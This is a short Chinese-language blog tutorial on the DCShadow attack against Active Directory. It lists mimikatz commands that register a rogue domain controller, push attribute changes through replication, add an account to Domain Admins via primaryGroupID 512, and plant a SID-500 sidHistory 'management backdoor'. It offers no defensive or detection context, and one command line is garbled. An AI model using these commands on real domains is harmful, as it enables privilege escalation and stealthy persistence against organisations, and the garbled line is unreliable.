DCShadow攻击

2021-04-01 14:46:59 浏览数 (3)

原理

Mimikatz远程从DC中复制数据,即Dcsync;类似的dcshadow可以伪装成DC,让正常DC通过伪造的DC中复制数据。

步骤

1、通过dcshadow更改配置架构和注册SPN值,将我们的服务器注册为Active Directory中的DC

2、在我们伪造的DC上更改数据,并利用域复制将数据同步到正常DC上。

首先加载mimikatz的驱动保证你在system权限下:

代码语言:javascript复制
! !processtokentoken::whoami

更改属性描述值

代码语言:javascript复制
lsadump::dcshadow /object:CN=dc,CN=Users,DC=test,DC=org /attribute:description /value:”xxxxxx”

然后新开一个窗口,以域管权限运行mimikatz:

代码语言:javascript复制
lsadump::dcshadow /push

然后win7的描述就更改为了我们刚才定义的内容。

然后我们就可以使用下面的方法,添加域管:

代码语言:javascript复制
lsadump::dcshadow /object:CN=win7,CN=Users,DC=test,DC=org /attribute:primarygroupid /value:512

或者是管理后门

代码语言:javascript复制
lsadump::dcshadow /object:CN=dc,CN=Users,DC=seven,DC=com /attribute:sidhistory /value:S-1-5-21-1900941692-2128706383-2830697502-500

0 人点赞